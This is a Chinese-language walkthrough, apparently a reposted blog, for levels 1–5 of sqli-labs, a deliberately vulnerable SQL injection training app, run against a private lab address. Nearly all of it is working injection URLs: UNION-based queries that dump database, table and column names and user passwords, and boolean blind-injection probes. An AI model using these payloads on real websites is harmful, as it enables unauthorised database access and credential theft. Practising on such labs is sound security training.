sqli-labs通關1-5教程


前言:

好久沒手注了,被問了手注相關問題,忘的一干二凈,抽出時間把手注再回憶一下,把sqli-labs簡單過一下吧。

Less-1(GET單引號字符型注入)

#輸入單引號后報錯
http://192.168.1.115/sqli-labs/Less-1/?id=1%27

#確定字段數
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 3%23
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 4%23

#聯合查詢查看頁面是否有顯示位
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,2,3%23

#查詢數據庫名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23

#查詢表名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23

#爆列
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23

#爆值
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23

Less-2(GET整型注入)

#查看頁面變化
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=1
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=2
#確定數字段
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 3%23
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 4%23
#聯合查詢查看顯示位
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,2,3
#爆庫
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),3
#爆表
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")
#爆列
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
#爆值
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(username,password),3 from users

Less-3(GET單引號變形字符型注入)

#查看頁面報錯
http://192.168.1.115/sqli-labs/Less-2/?id=1'
http://192.168.1.115/sqli-labs/Less-3/?id=1%27)%20%23
#確定數字段
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 3%23
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 4%23
#聯合查詢查看顯示位
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union%20select%201,2,3%23
#爆庫
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23
#爆表
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23
#爆列
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
#爆值
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(username,password),3 from users%23

Less-4(GET雙引號字符型注入)

http://192.168.1.115/sqli-labs/Less-4/?id=1%22

http://192.168.1.115/sqli-labs/Less-4/?id=1%22)%20%23

查看報錯信息,使用雙引號、右括號閉合,其余按照聯合查詢流程即可

Less-5(基於布爾的盲注)

#判斷數據庫版本,left(code, 1)表示取code字段從左截取1位
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=4 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=5 %23

#判斷數據庫長度,使用length()判斷長度,二分法可提高效率
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())=8 %23

#猜當前數據庫名,left(code, 1)表示取code字段從左截取1位,截取至數據庫長度即可判斷出數據庫名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>'r' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>'t' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)='s' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>'d' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>'f' %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)='e' %23
...

#判斷表的個數,count()函數是用來統計表中記錄的一個函數,返回匹配條件的行數。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(table_name) from information_schema.tables where table_schema=database())>0  %23

#判斷表的長度,limit可以被用於強制select語句返回指定的記錄數。
// SELECT * FROM table LIMIT 5,10; // 檢索記錄行 6-15
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 %23

#依次猜表名,substr(string,start,length);string為要截取的字符串;start為截取的起始位置;length為截取長度。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80 %23
...類似

#確定列數
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')>0 %23

#確定列的長度
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select  column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1)) > 0 %23

#依次猜列名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),1,1))>79  %23

#確定數據
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select username from users limit 0,1),1,1))>79  %23


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM